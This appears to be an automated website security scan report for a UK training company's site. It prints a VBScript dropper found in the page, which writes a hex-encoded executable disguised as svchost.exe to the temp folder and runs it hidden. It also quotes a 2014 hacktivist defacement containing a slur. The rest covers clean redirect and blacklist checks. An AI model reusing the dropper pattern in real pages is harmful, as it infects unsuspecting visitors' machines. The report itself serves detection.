Scanned pages/files
Request | Server response | Status |
http://www.bluewhaletraining.co.uk/ | 200 OK Content-Length: 116922 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: Hacked by ...[1221 bytes skipped]... src="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-xap1/t1.0-9/10371894_691548260939258_388986167118990225_n.jpg"></center> <p align="center"> <body bgcolor="black"> <font size='6' face=' One'style="color: white; text-shadow: 0px 1px 7px aqua";>#OpSaveGaza 11/07/2014</font><br> <font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px red";>Hacked by </font><font size='4' face=' One'style="color: green; text-shadow: 0px 1px 7px green";> Samir-Dz </font> <br><font size='3' face=' One'style="color: white; text-shadow: 0px 1px 8px white";>Hi IsraHell , where is the security bitchs?</font><br> <font size='4' face=' One'style="color: yellow; text-shadow: 0px 1px 7px aqua";>Greetings world we are AnonGhost</font><br> <font size='4' face=' One'style="color: a ...[115737 bytes skipped]... | ||
http://www.bluewhaletraining.co.uk/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Result:
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Referer: http://www.google.com/search?q=bluewhaletraining.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bluewhaletraining.co.uk
Referer: http://www.google.com/search?q=bluewhaletraining.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bluewhaletraining.co.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bluewhaletraining.co.uk/
Result: bluewhaletraining.co.uk is not infected or malware details are not published yet.
Result: bluewhaletraining.co.uk is not infected or malware details are not published yet.